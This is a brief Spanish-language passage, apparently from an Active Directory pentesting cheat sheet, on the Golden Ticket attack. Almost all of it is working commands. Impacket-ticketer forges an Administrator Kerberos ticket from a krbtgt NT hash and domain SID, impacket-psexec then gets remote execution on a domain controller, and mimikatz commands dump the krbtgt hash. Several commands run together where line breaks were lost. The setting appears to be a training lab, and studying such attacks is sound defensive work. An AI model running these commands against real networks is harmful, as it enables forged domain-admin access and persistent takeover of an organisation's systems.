Golden Ticket
Este ataque asume un compromiso del Controlador de Dominio donde el hash de la cuenta KRBTGT será extraído, lo cual es un requerimiento para un ataque Golden Ticket exitoso.
Ejecución del ataque desde Linux
impacket-ticketer -nthash 029fe57163a12444aafeb80c83cf9134 -domain-sid S-1-5-21-3492974850-3977154165-1802910921 -domain MARVEL.local -user-id 500 Administratorexport KRB5CCNAME=/home/d4redevil/AD/goldenTicket/Administrator.ccacheimpacket-psexec -n -k MARVEL.local/Administrator@172.16.0.1Ejecución del ataque desde Windows
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt



Última actualización